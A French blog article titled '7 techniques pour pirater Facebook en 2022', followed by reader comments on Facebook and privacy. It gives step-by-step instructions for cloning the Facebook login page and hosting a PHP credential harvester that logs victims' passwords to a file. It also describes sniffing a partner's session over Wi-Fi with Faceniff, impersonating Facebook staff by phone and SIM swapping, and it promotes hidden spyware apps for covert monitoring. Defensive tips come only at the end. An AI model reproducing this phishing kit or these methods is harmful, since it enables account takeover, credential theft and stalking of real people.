7 techniques pour pirater Facebook en 2022

Photo of author
Écrit par Agnès Michaud

Une passion pour la technologie alliée à une soif viscérale de la rendre utile aux relations humaines.

Facebook est l’une des formes les plus populaires de réseau social. Des milliards d’utilisateurs en profitent tous les jours, et il possède les normes de sécurité les plus élevées.

Si vous voulez améliorer vos compétences en matière de piratage informatique, ou si vous voulez simplement garder un œil sur vos enfants, le piratage conjoint des mots de passe Facebook est vital.

Et même si vous devez éviter de faire quoi que ce soit d’illégal, vous devez savoir comment vous protéger, vous et votre famille, pour empêcher quelqu’un d’accéder à vos comptes.

Comment pirater l’identifiant et le mot de passe du compte Facebook avec un Keylogger

Les keyloggers enregistrent les frappes qu’une cible presse sur son clavier. Ils sont souvent utilisés pour recueillir les mots de passe.

Vous trouverez ci-dessous quelques-uns des keyloggers les plus populaires de nos jours.

Les keyloggers pour Windows et Mac OS

Ces outils d’enregistrement de frappe fonctionnent secrètement sur un ordinateur et recueille les données des utilisateurs.

Ils enregistrent les frappes au clavier et vous permettent de visualiser l’appareil à distance, quel que soit l’endroit où vous vous trouvez.

Vous devez avoir un accès physique aux machines pour installer cette application.

Les enregistreurs de frappe pour téléphones portables

Si vous avez besoin d’un keylogger pour smartphone avec un système d’exploitation Android ou iOS, nous vous recommandons d’essayer ces 2 options :

mSpy

Site officiel

mSpy est l’outil de surveillance et de suivi mobile le plus utilisé de nos jours.

Il regorge de fonctionnalités utiles qui incitent les utilisateurs à choisir mSpy plutôt que ses concurrents.

Ses fonctionnalités les plus utilisées sont les suivantes :

  • Surveillance invisible des applications de messagerie (Facebook Messenger / WhatsApp / SMS / Viber / Instagram et autres)
  • Suivi de la localisation du téléphone
  • Suivi des conversations téléphoniques (sortantes et entrantes)
  • Enregistrement des frappes au clavier
  • Prise en charge pour les appareils Android et iOS

Flèche double vers le bas

Hoverwatch

Site officiel

Hoverwatch vous permet de surveiller à distance n’importe quel appareil Android (il ne marche pas sur iPhone). 

Ce logiciel primé vous permet de garder un œil sur votre cible, à condition que vous ayez obtenu son accord.

Il sait cacher son icône et est un des seuls keyloggers à pouvoir enregistrer en plus les appels et les conversations du téléphone. 

Flèche double vers le bas

D’autres outils de surveillance que vous pourriez vouloir vérifier comprennent EyeZy et uMobix. Ils sont tous très efficaces pour localiser les activités de votre enfant sur Facebook et sur internet.

➢ EyeZy

EyeZy est une application d’espionnage de Facebook qui vous permet de surveiller l’activité de votre enfant sur ses appareils.

La plateforme fonctionne avec les appareils Android, iOS, WhatsApp et iCloud pour offrir aux parents une couverture complète.

Les parents peuvent télécharger l’application gratuitement mais doivent payer un service d’abonnement pour surveiller l’activité.

  • Il est possible de bloquer l’accès aux sites web
  • de surveiller les journaux d’appels et les contacts
  • de capturer les écrans à distance
  • et de suivre les localisations

De même, elle offre une option supplémentaire pour les appareils Android et iOS, notamment le Geofencing et la surveillance des exportations de données.

Caractéristiques :

  • Il inclut un traceur GPS
  • Permet de faire des captures d’écran
  • Vous pouvez voir les contacts et tous les appels et textes associés à chacun d’eux
  • Il dispose d’un enregistreur de frappe qui vous permet de voir leurs noms d’utilisateur et leurs mots de passe.
  • Vous pouvez voir les médias et les messages supprimés, y compris les chats et les photos ou vidéos.
  • Il vous permet de voir quelles applications sont utilisées et à quelle fréquence.

Garantie de remboursement de 30 jours.

Flèche double vers le bas

uMobix

uMobix est l’une des meilleures applications d’espionnage mobile permettant aux parents de suivre les allées et venues de leurs enfants et l’utilisation de leur appareil.

Les parents peuvent suivre les appels, la localisation en temps réel et la galerie de photos à partir d’un seul tableau de bord. Il est convivial et vous permet d’accéder aux informations à distance.

Bloquez des pages, vérifiez les signets et l’historique du navigateur, et gérez l’utilisation des données de n’importe où pour assurer la sécurité de votre enfant.

Caractéristiques :

  • Lire les conversations et les messages Facebook Messenger
  • Vous aurez accès à leur liste de contacts et à leurs réseaux sociaux
  • Il vous donne un traceur de localisation GPS pour savoir où ils sont à tout moment.
  • Recherchez facilement les informations de contact et vérifiez le profil Facebook.

Flèche double vers le bas

Comment pirater le compte Facebook de mon copain par Wi-Fi ?

Pour pirater un compte Facebook par Wi-Fi, vous devez télécharger Faceniff, une application Android qui vous donnera accès à toutes les informations de l’appareil cible, y compris le nom d’utilisateur et le mot de passe des comptes de réseaux sociaux de la cible.

Vous devez également vous assurer que la cible se trouve sur le même réseau Wi-Fi que vous.

  • Connectez-vous à internet
  • Lancez l’application Faceniff une fois le téléchargement terminé
  • Appuyez ensuite sur la touche Entrée après avoir cliqué sur le bouton rouge, qui deviendra rouge après l’activation du renifleur
  • Une liste de comptes liés au réseau Wi-Fi s’affiche, dans laquelle vous pouvez sélectionner le compte que vous souhaitez pirater

Alternative à Faceniff pour pirater Facebook : le logiciel AndroRAT dont nous parlions dans cet article

La méthode de l’hameçonnage

Le phishing est un moyen courant utilisé pour pirater un compte Facebook

En effet, il est très facile de tromper l’utilisateur en lui demandant de donner aveuglément ses identifiants Facebook sans qu’il le sache.

L’hameçonnage est responsable de 80 % des piratages de comptes et cette statistique ne risque pas de changer de sitôt, grâce à son taux de réussite pour pirater un mot de passe.

 Concrètement, le pirate crée une fausse page de connexion à Facebook qui ressemble à la vraie

  • Le pirate envoie ensuite à la cible un courriel ou un SMS en se faisant passer pour le personnel d’administration de Facebook.
  • La communication indique que l’utilisateur doit se connecter à son compte Facebook pour des raisons de sécurité ou pour vérifier le texte d’un ami.
  • Le message contient un lien vers la page de phishing.
  • Lorsque l’utilisateur clique sur le lien, il se retrouve sur la page du pirate au lieu de la page de connexion Facebook légitime.
  • La victime saisit alors son nom d’utilisateur et son mot de passe.
  • Dans de nombreux cas, le pirate informatique redirige ensuite la fausse page de phishing vers le site Facebook officiel, ce qui permet à la victime de visiter sa vraie page après s’être connectée.

Cette stratégie laisse la cible dans l’ignorance totale de toute activité suspecte. Elle donne aussi au pirate informatique tout le temps nécessaire pour accéder à la page et faire ce qu’il veut du compte, y compris changer le mot de passe pour verrouiller l’utilisateur.

Le mot de passe Facebook déverrouille aussi Messenger et Instagram

Puisque Facebook est lié à Instagram, il est possible pour le pirate d’accéder également à votre compte Instagram.

Les pirates informatiques volent vos données et les vendent sur le Dark Web à des utilisateurs qui commettent des cyberdélits tels que la fraude et l’usurpation d’identité.

La mise en place d’une page de phishing est un processus compliqué et la plupart des pirates informatiques ont besoin d’outils logiciels spécialisés pour monter des escroqueries de phishing.

Cependant, il est possible de créer une page d’hameçonnage à l’aide d’un simple code HTML, à condition de savoir ce que vous faîtes.

Comment créer une page d’hameçonnage Facebook à partir de rien

La conception d’une page d’hameçonnage n’est pas aussi difficile que vous le pensez.

Matériel nécessaire pour créer une page de phising

  • un PC
  • une connexion internet
  • la volonté d’apprendre quelques bases du langage HTML
  • un compte d’hébergement web
  • un bloc-notes

Si vous disposez de ces outils, vous pouvez suivre cette méthode pour mettre en place votre première page de phishing Facebook.

Étape 1

  • Déconnectez-vous de votre compte Facebook
  • Visitez la page de connexion par défaut de www.facebook.com.
  • Cliquez avec le bouton droit de la souris n’importe où sur la page
  • Cliquez sur « Voir le code source »
  • Sélectionnez tout le texte
  • Copiez-le dans le bloc-notes (CTRL+A puis Copier)
  • Ouvrez une page blanche du bloc-notes
  • Collez tout à l’intérieur

Étape 2

  • Cliquez sur le haut du texte dans le bloc-notes avec le bouton gauche de la souris
  • Maintenez la touche CTRL+F enfoncée
  • Tapez « action= » dans la zone de recherche sans les guillemets
  • Cliquez sur « Find Next »
  • Il devrait y avoir deux « action= » dans le texte, c’est le premier qui nous intéresse
  • Remplacez le lien entre les guillemets par « post.php« 
  • Ne changez pas les guillemets, mais seulement le texte entre les guillemets
  • Allez ensuite dans Fichier > Enregistrer sous
  • Nommez le fichier « index.html« 
  • Réglez l’option d’encodage sur « Unicode »

Facebook méthode de phising

Étape 3

  • Créez un nouveau document bloc-notes avec le nom de post.php
  • Copiez et collez le code suivant dans ce document avant de sauvegarder

<?php
header (‘Location:http://www.facebook.com/’);
$handle = fopen(‘usernames.txt’, ‘a’);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, ‘=’);
fwrite($handle, $value);
fwrite($handle, ‘rn’);
}
fwrite($handle, ‘rn’);
fclose($handle);
exit;
?>

Étape 4

Vous aurez besoin d’un compte d’hébergement web puisqu’une page de phishing est essentiellement une page de site web sur un compte hébergé.

Cela peut poser un problème à certaines personnes qui souhaitent le faire gratuitement, mais il existe des solutions d’hébergement gratuites.

Le problème avec ces solutions gratuites, c’est que ces comptes sont souvent suspendus parce que le phishing n’est pas autorisé par la plupart des sociétés d’hébergement.

Si vous voulez être sérieux, nous vous recommandons d’opter pour un vrai nom de domaine et un hébergement payant. Comme vous avez payé pour cela, vous êtes propriétaire et vous pouvez héberger sur votre site web ce que vous voulez.

Étape 5

  • Téléchargez les 2 fichiers d’affichage et d’indexation sur votre compte d’hébergement web (index.htm et post.php) dans le dossier « public_html »
  • Supprimez le fichier default.php s’il est présent
  • Connectez-vous à votre cPanel
  • Allez dans le gestionnaire de fichiers > public_html
  • Vous êtes maintenant prêt à utiliser votre page de phishing
→ Si c’est un compte gratuit, visitez le lien personnalisé que vous avez reçu lors de l’inscription à votre compte d’hébergement web.
→ Si vous avez enregistré un vrai nom de domaine, alors votre nom de domaine est votre site web de phishing.

  • Lorsqu’une victime suit ce lien, elle se retrouve sur votre page d’hameçonnage.
  • Lorsqu’elle saisit son nom d’utilisateur et son mot de passe, la page les stocke dans le fichier « usernames.txt » dans le même dossier « public_html » .

Comment utiliser l’ingénierie sociale pour pirater un compte Facebook

L’ingénierie sociale est une façon intelligente d' »arnaquer » les gens pour qu’ils vous donnent accès à leurs données de connexion sur Facebook.

Il existe plusieurs méthodes créatives pour cette approche, les suivantes étant les plus populaires :

1/ Se faire passer pour un technicien

  • Appelez la cible
  • Faîtes-vous passer pour un technicien Facebook
  • Demandez-lui de vous fournir ses données de connexion pour que vous puissiez vérifier son compte
  • Vous serez surpris de voir combien de personnes sont prêtes à donner leurs secrets si elles pensent qu’une figure autoritaire est au téléphone avec elles

2/ Emprunter le téléphone

  • Demander à emprunter le téléphone de la cible
  • Obtenir les informations de connexion en quelques secondes grâce à cette stratégie (il vous les donne volontairement)

3/ L’échange de SIM

L’attaque par échange de carte SIM est à mon avis la méthode gratuite la plus sournoise et la plus malveillante pour pirater le mot de passe d’un compte Facebook, ou tout autre mot de passe de compte en ligne. 

L’échange de cartes SIM est une forme d’usurpation d’identité dans laquelle l’agresseur trompe un opérateur de téléphonie mobile et le convainc de changer le numéro de téléphone de sa victime pour un nouveau numéro de téléphone que l’agresseur possède.

L’attaquant fait cela pour détourner les messages SMS contenant des mots de passe à usage unique (OTP). Ils sont envoyés au numéro de téléphone lors d’opérations telles que :

  • la réinitialisation du mot de passe d’un compte
  • l’exécution d’une transaction bancaire, etc.

Une fois les SMS interceptés, le pirate peut faire un reset du mot de passe Facebook et prendre possession du compte.

Comment pirater le mot de passe de Messenger ?

Facebook a maintenant séparé sa messagerie du réseau social principal. Cependant, les deux restent liés au même compte.

De ce fait, pour pirater le mot de passe de Messenger, les mêmes techniques de piratage doivent être utilisées.

Messenger, Facebook et Instagram : même combat

La seule différence est que Messenger est plus souvent utilisé sur un smartphone que sur un ordinateur (il est conçu pour ça).

De ce fait, le moyen le plus facile pour pirater la messagerie Messenger de quelqu’un reste d’installer sur son portable une application d’espionnage furtive :

Flèche double vers le bas

Ce qui ne fonctionne plus si vous souhaitez pirater un compte Facebook

La perte du mot de passe

Vous avez peut-être entendu parler de la technique de la perte du mot de passe pour récupérer un nouveau mot de passe Facebook en connaisant simplement la messagerie Email de la victime ?

Eh bien cette technique ne fonctionne plus, Facebook ayant tout simplement mis en place un blocage du compte lorsque l’adresse IP et l’ordinateur de connexion lui semblent différents de la normale.

D’autres arnaques qu’il ne faut pas utiliser

Face-Geek.com est un site très bien placé dans Google lorsqu’on se renseigne pour pirater un compte Facebook, et en effet son site est assez bien fait :

  • Le service est doté d’un blog
  • d’une FAQ
  • sa page d’accueil donne envie
  • il utilise la même couleur bleue que le site officiel de Facebook

Face-Geek affirme que son équipe est capable de hacker tout compte Facebook en retrouvant en quelques minutes seulement le mot de passe du compte à deux conditions :

  • 1/ Que vous connaissiez son identifiant (pour cela, rien de plus simple, il s’agit du numéro situé dans l’url du compte Facebook après https://www.facebook.com/profile.php?id=xxxxxxxxxxxx (les xxxxxxxxxxxx sont les numéros identifiants).
  • 2/ Que le mot de passe fasse moins de 20 caractères.

C’est beau ! me suis-je dit, puis j’ai commencé à douter quand j’ai lu que le site proposait ce service gratuitement malgré un « formulaire » à remplir pour soit-disant « éviter les surcharges de réseau » . Là je me suis dit deux choses :

  • 1/ l’entretien d’un site recevant des milliers de visiteurs coûte de l’argent, comment se font-ils rémunérer ?
  • 2/ un formulaire à remplir ? quelle technique anti-spam bizarre. N’est-ce pas plutôt pour récupérer mes données personnelles ?

➢ Les commentaires affirment qu’ils se sont fait avoir

Je me suis renseigné sur la réputation du site Face-Geek.com et je dois dire que je ne le testerai jamais moi-même de peur d’être victime d’une arnaque ou de phising.

Observez plutôt les commentaires sur la page Facebook du site :

Flèche double vers le bas

Commentaires sur la page Facebook de Face-geek.com - Cette page Facebook a aujourd'hui été fermée

Certains commentaires affirment :

  • « C’est une arnaque il marche même pas »
  • « Good luck »
  • « Ça marche pas »

Ensuite je me suis rendu sur https://www.lesarnaquesinternet.com, à l’époque le site face-geek.com y était répertorié. Là on pouvait lire les plaintes des consommateurs s’étant faits arnaquer :

commentaire sur face geek

Donc voilà pour ma part, j’arrête de me renseigner sur ce site en lequel je ne fais pas confiance.

D’autant plus que si Facebook avait eu connaissance de cette « facilité » avec laquelle un site pouvait récupérer les mots de passe de TOUS SES UTILISATEURS, cela fait bien longtemps que Face-geek.com aurait été assigné en justice ou qu’une parade aurait été trouvée.

➢ Learnhacker.com (anciennement Samhacker)

Ça ne marche pas et ces services cherchent le plus souvent à vous escroquer.

Il n’est tout simplement pas possible de percer un compte Facebook simplement à l’aide de l’Email du compte ou de son identifiant, tout simplement parce que Facebook a mis en place de nombreuses techniques de sécurité contre ça.

  • Envoi d’un texto sur votre portable avec un code à taper dans Facebook
  • Détection d’une nouvelle adresse IP autre que la vôtre qui tente de se connecter à votre compte
  • Suspension temporaire de votre compte par mesure de sécurité, le temps que vous répondiez à votre question secrète

Quand un produit est gratuit c’est que vous êtes le produit

Vous vous rappelez de la phrase :

« Quand un produit est gratuit, c’est que c’est vous le produit. »

Avec ces sites gratuits c’est exactement ça. Il y a automatiquement une arnaque.

Savoir comment pirater un compte facebook sans logiciel mérite un peu plus de d’inventivité, comme nous allons le voir ci-dessous.

Récapitulatif : Liste des 7 vraies techniques pour pirater un compte Facebook

1- L’hameçonnage

Un hacker motivé peut créer un faux site Facebook et vous envoyer un faux Email se faisant passer pour le réseau social officiel.

C’est la technique de l’hameçonnage : vous vous connectez à ce site en rentrant vos identifiants, et le hacker récupère du coup votre mot de passe.

2- Les keyloggers

Un logiciel malveillant peut s’installer dans votre ordinateur à la manière d’un virus qui enregistre tout ce que vous tapez au clavier : ce sont des keyloggers (description ici).

Le jour où vous vous connectez à Facebook en rentrant votre identifiant et votre mot de passe, le keylogger les enregistre et les retransmet au hacker.

3- Un logiciel espion

Votre smartphone tout entier peut se faire pirater à l’aide d’un logiciel espion pour smartphone, dont le plus réputé est Mspy.

L’individu doit prendre le téléphone en main et y installer l’application invisible.

Ce type d’application pour téléphone portable envoie au pirate :

  • les messages Facebook
  • les tchats sur les réseaux sociaux et messageries (même Tinder)
  • les Emails, photos, vidéos
  • les appels
  • les localisations de l’appareil

4- Le détournement de cookies

Votre session Windows peut être détournée.

Lorsqu’un utilisateur navigue sur son flux Facebook, des informations concernant son statut de connexion servent à indiquer qu’il est authentiquement connecté.

A cette fin, des petits fichiers inoffensifs sont enregistrés sur votre disque dur : on les appelle des cookies.

Cryptés, ils contiennent des données très sensibles. Le détournement de ces cookies peut aider à accéder au compte Facebook d’une victime.

Il faut des connaissances en hacking pour accéder à ces fichiers et les utiliser pour déchiffrer le mot de passe Facebook de la victime (voir ici les logiciels utilisés).

5- La méthode de la force brute

La méthode de la force brute consiste à envoyer des requêtes aux serveurs Facebook à très grande vitesse.

Au bout d’un certain temps, à force d’essais répétés, le mot de passe correct peut être trouvé.

Cette méthode consomme beaucoup de ressources et n’est pas recommandée, les gros sites sachant dorénavant s’en protéger.

force mot de passe keepass

6- Le DNS Spoofing

Le DNS Spoofing est l’une des méthodes les plus avancées pour pirater Facebook avec un taux de réussite élevé.

Il s’agit d’accéder au PC ou à l’appareil mobile de la victime et de modifier les adresses DNS d’internet.

De cette façon, toute information devant être envoyée aux serveurs de Facebook sera envoyée à un serveur pirate.

Cette méthode de piratage est assez difficile à mettre en place, mais en cas de succès le taux de réussite du piratage de facebook est de 100%.

7- Les Bots USB

Enfin, comme indiqué dans cet article d’un Geek, les clés USB peuvent être utilisées pour lancer un programme à votre insu. Les « Bots USB » sont assez couramment utilisés dans le domaine du piratage de comptes facebook.

Malheureusement, cette astuce ne marche plus sur Windows 10 & 7 parce que l’exécution automatique de Windows favorisait l’installation de virus et que Microsoft a purement et simplement retiré l’AutoRun de ces deux OS lors de la connexion d’un support USB à un PC.

Conclusion

Comment reconnaître un compte piraté ?

Voici 5 signes généraux qui indiquent que votre compte Facebook a été piraté.

  1. Vous ne pouvez plus accéder à votre compte. Le pirate a peut-être changé le mot de passe et vous a déconnecté.
  2. Quelqu’un publie des articles ou des messages à votre insu. Il peut s’agir de promotions, d’offres de spam, etc. Vous pouvez également remarquer des publications dans votre groupe Facebook.
  3. Quelqu’un envoie du spam à vos amis et contacts.
  4. Vos photos deviennent virales, ou quelqu’un les a publiées sur internet ou dans un groupe Facebook.
  5. Des pirates informatiques malveillants peuvent envoyer des liens de phishing à vos amis dans le but de pirater d’autres comptes.

La première chose que vous pouvez faire pour protéger votre compte Facebook : Activer l’authentification à 2 facteurs

Une fois cette option activée, votre compte nécessitera deux éléments pour se connecter :

Pour ce faire :

  • Sur votre mobile, ouvrez l’application Facebook et cliquez sur Menu
  • Faites défiler l’écran vers le bas et cliquez sur Paramètres
  • Faites défiler vers le bas et cliquez sur Sécurité et connexion
  • Cliquez sur Configurer l’authentification à deux facteurs et suivez les instructions
  • Si vous voyez un symbole de verrouillage vert en haut de l’écran, c’est que vous êtes déjà configuré et que vous pouvez commencer

Une autre fonction de sécurité à activer est la fonction Contacts de confiance de Facebook. Elle utilise vos amis pour vous aider à retrouver l’accès à votre compte si vous êtes bloqué.

Attention à cette méthode des contacts de confiance pour récupérer un compte Facebook : elle est sur le point d’être supprimée de Facebook.

trois contacts de confiance recuperer compte facebook

Enfin, si votre compte est verrouillé, le premier endroit à visiter est facebook.com/hacked.

Vous pourrez :

  • y raconter ce qui s’est passé
  • répondre à des questions sur votre compte
  • et éventuellement vous identifier pour que Facebook puisse vous rendre l’accès légitime

Sachez que non seulement cela peut prendre un certain temps, mais qu’il se peut aussi que vous ne retrouviez pas du tout votre accès.

Malgré les techniques que nous venons d’exposer pour pirater un compte Facebook, le réseau social n°1 reste totalement fiable si vous prenez soin de :

  • vous rendre dans les paramètres « Sécurité »
  • personnaliser vos options de confidentialité
  • utiliser un pare-feu efficace pour éviter qu’un hacker n’emprunte votre connexion à distance

Aujourd’hui Facebook a fait d’énormes efforts pour rendre son réseau social sûr à partir du moment où vous sélectionnez les bonnes options de confidentialité et de sécurité.

Comment empêcher le piratage de Facebook ?

Voici les étapes à suivre pour éviter que quelqu’un ne pirate votre Facebook :

  1. Ne cliquez pas sur les liens contenus dans les emails, surtout s’ils ne proviennent pas d’une source vérifiée.
  2. Si vous devez visiter un lien, lisez-le attentivement. Il est même préférable d’aller sur le site web et de chercher le contenu dont vous avez besoin.
  3. Ne cliquez sur aucun lien si vous recevez une fenêtre contextuelle lorsque vous visitez un forum ou un salon de discussion.
  4. Utilisez le meilleur logiciel de sécurité comprenant un antivirus, car il est généralement doté de filtres antiphishing.

 Cliquez pour lire :

Mon voisin m’espionne : que faire?

Espionner vos concurrents à l’aide des publicités Facebook

MSpy espionne les réseaux sociaux et les conversations sur un téléphone

Le logiciel espion

mSpy bannière promotionnelle

106 réflexions au sujet de “7 techniques pour pirater Facebook en 2022”

  1. Facebook n’est pas un site de réseau social, c’est un moteur de publicité qui offre un contenu interactif que les gens trouvent suffisamment attrayant pour y participer en grand nombre.

    Répondre
  2. Sur internet, Facebook suit les sites que vous visitez et leur durée, les pages que vous lisez, ce que vous « aimez » sur tous les sites qui utilisent le bouton « Like » de Facebook ou un pixel de suivi invisible (ce qui représente un nombre considérable de sites).

    Il le fait que vous soyez connecté ou non à Facebook. Il localise votre adresse IP et détermine à qui vous pourriez être associé ou lié en regardant également qui d’autre utilise cette même adresse IP et ce qui les intéresse.

    Répondre
  3. L’ère numérique a apporté à la société des changements si fondamentaux que nous ne les avons pas encore saisis.

    Par exemple, les assistants numériques intelligents s’immiscent dans votre vie privée de manière stupéfiante, tout en étant très pratiques (ou pas ?).

    Répondre
  4. Facebook est criticable mais tant qu’il y aura des tonnes d’usagers sur cette plate-forme, elle restera sous le feu des projecteurs…

    Répondre
    • C’est comme pour Google : Les webmestres restent dépendants de ses résultats car les gens n’arrivent pas à changer de moteur de recherche…

  5. Facebook a été une force négative pour la démocratie, car il brise la barrière entre le réel et la rumeur. Et maintenant que la pénétration des réseaux sociaux bat son plein, Facebook exerce sur nous tous un contrôle bien trop important pour que nous puissions l’imaginer.

    Répondre
  6. Il est illégal d’intercepter et d’ouvrir le courrier physique de première classe des gens, alors pourquoi n’avons-nous pas les mêmes lois pour protéger leur email ?

    Répondre
  7. Facebook sait qui sont vos amis personnels et vos associés professionnels, et peut établir des cartes thermiques de la majorité de vos relations avec des personnes et des entreprises.

    Il utilise des techniques d’IA pour lire et classer automatiquement vos publications et chaque mot que vous tapez dans Facebook Messenger.

    Répondre
  8. En fait, jusque dans les années 1990, TOUTES les formes de communications personnelles étaient protégées par des lois strictes.

    La donne a changé. Tout cela est désormais de l’histoire ancienne. Avec l’avènement d’Internet, nos législateurs sont restés pratiquement muets sur la question de la protection de la vie privée numérique.

    Répondre
  9. Facebook localise à la fois votre vie numérique et certains aspects de votre vie physique afin de déterminer vos centres d’intérêt et de vous catégoriser pour les annonceurs. Il existe des centaines de catégories, allant de votre sexualité au type de déodorant que vous préférez, de vos associations religieuses et politiques à vos goûts musicaux et médiatiques. Alors pourquoi seul ce réseau social pourrait espionner le contenu ?

    Répondre
  10. Puisque c’est un petit nombre (les gens au pouvoir) qui manipule le grand nombre (le reste du monde), la seule façon de réaliser une manipulation à une si grande échelle est de contrôler la perception du grand nombre et de diviser pour mieux régner.

    Et pour contrôler la perception, il faut contrôler l’information.

    Le flux de Facebook peut être facilement manipulé et montrer le contenu qu’il veut que vous voyiez.

    Répondre
  11. Si vous utilisez l’application Facebook sur un appareil mobile, elle signale votre position GPS minute par minute à Facebook 24 heures sur 24, 7 jours sur 7, avec une résolution suffisamment détaillée pour savoir dans quels magasins vous vous trouvez, où vous dînez, quels itinéraires vous empruntez, où vous travaillez et à côté de quels téléphones votre téléphone dort, avec tout ce que cela implique sur vous et cette autre personne dans le monde physique.

    Répondre

Laisser un commentaire